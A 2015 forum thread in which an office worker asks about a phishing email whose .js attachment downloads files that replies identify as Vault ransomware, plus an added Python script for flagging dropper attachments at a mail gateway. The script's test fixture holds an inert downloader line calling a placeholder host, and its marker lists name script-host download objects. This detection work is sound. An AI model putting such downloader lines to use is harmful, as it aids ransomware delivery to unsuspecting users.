Burglary protection
avvor, 2015-10-27 13:32:22

A letter came with a .js file inside, in which strange things happen; does anyone know what it is?

Today, a letter came to my work mail with completely harmless content: "Good day, we, for our part, understand that there is a crisis in the yard, but nevertheless my management proposes signing the Reconciliation Act (see attachment)...". I immediately noticed that the attachment had the .js extension. I opened it in Notepad; it downloads 3 files from a certain site: an exe, a bat and a doc.
I couldn't stop; it became very interesting what it was, so I spun up a virtual machine, picked up the files (even tried to run the exe and bat) and decided to write here; maybe someone knows what it is?
1. The bat file contains this text:
[screenshot of the bat file contents]
Google Translate recognizes this as Chinese: "Yi Pen atonement for idling Liu Jiao pancakes."
How can a bat file be in Chinese? Is it encrypted with something, or can scripts be written in different languages?
2. The doc file when opened:
[screenshot of the opened doc file]
Again Chinese, and it is not at all clear what it is and why.
3. When you run the exe, the GnuPG library is downloaded.
[screenshot of the GnuPG download]
Does anyone know what this is? It became wildly interesting.
Thank you 27cm, that's what's in the batch file:
[screenshot of the decoded batch file contents]
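A small mail-attachment triage check for the delivery vector described in this post (a script attachment arriving in corporate mail). This is an added example, not code from the original thread; the extension list, marker strings and the sample message are my own constructed assumptions, chosen to mirror the post rather than any specific sample.

```python
import email
import re
from email import policy
from email.message import EmailMessage

# Extensions Windows executes when double-clicked; a .js attachment is what
# delivered the downloader in the post above. (Assumed list, not exhaustive.)
SCRIPT_EXTENSIONS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".bat", ".cmd",
                     ".exe", ".scr", ".hta"}
# Strings typical of a script-host downloader (assumed markers).
DOWNLOADER_MARKERS = ["ActiveXObject", "WScript.Shell", "MSXML2.XMLHTTP",
                      "ADODB.Stream"]
URL_RE = re.compile(rb"https?://[^\s'\"]+")


def attachment_findings(raw_message: bytes) -> list:
    """Return one finding per attachment that looks like an executable dropper."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        ext = "." + name.rsplit(".", 1)[-1] if "." in name else ""
        payload = part.get_payload(decode=True) or b""
        reasons = []
        if ext in SCRIPT_EXTENSIONS:
            reasons.append(f"executable extension {ext}")
            if name.count(".") > 1:          # e.g. report.doc.js
                reasons.append("double extension")
        hits = [m for m in DOWNLOADER_MARKERS if m.encode() in payload]
        urls = URL_RE.findall(payload)
        if hits and urls:                    # script-host objects plus a URL
            reasons.append(f"downloader markers {hits} with {len(urls)} URL(s)")
        if reasons:
            findings.append({"name": name, "reasons": reasons})
    return findings


def sample_message() -> bytes:
    """Constructed fixture: harmless body text plus an inert .js attachment."""
    m = EmailMessage()
    m["From"] = "sender@example.invalid"
    m["To"] = "victim@example.invalid"
    m["Subject"] = "Reconciliation Act"
    m.set_content("Good day, please sign the Reconciliation Act (see attachment).")
    js = (b'var x = new ActiveXObject("MSXML2.XMLHTTP");\n'
          b'x.open("GET", "http://example.invalid/file.exe", false);\n')
    m.add_attachment(js, maintype="application", subtype="javascript",
                     filename="Act_reconciliation.doc.js")
    return m.as_bytes()


if __name__ == "__main__":
    for f in attachment_findings(sample_message()):
        print(f["name"], "->", "; ".join(f["reasons"]))
```

Such a check belongs at the mail gateway, where a flagged attachment can be quarantined before a user gets the chance to double-click it.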


2 answers
Irina, 2015-11-02
@avvor

The Vault encryptor uses gpg, encrypts all *.doc and *.jpg files, mail, etc., creates a key pair and sends its own to the scammers, after which it creates a text file with an offer to pay money in order to get the key and decrypt the files. The price ranges from 50 to 1000 dollars; the scammers' site is on the Tor network. When my users caught this infection, I contacted Casper and Nod32; they confirmed that there was no cure and would not be for a long time, and the virus itself was not detected by antiviruses. So be careful and do explanatory work with users; this is the only way to avoid infection as much as possible.

avvor, 2015-10-27
@avvor

And where can I write to get their site blocked? I understand that they will register a new one, but at least do something; people will suffer from such tricks. It came to my corporate mail; managers would 100% open and launch it. I was lucky that I was the first to open the mail in the morning.
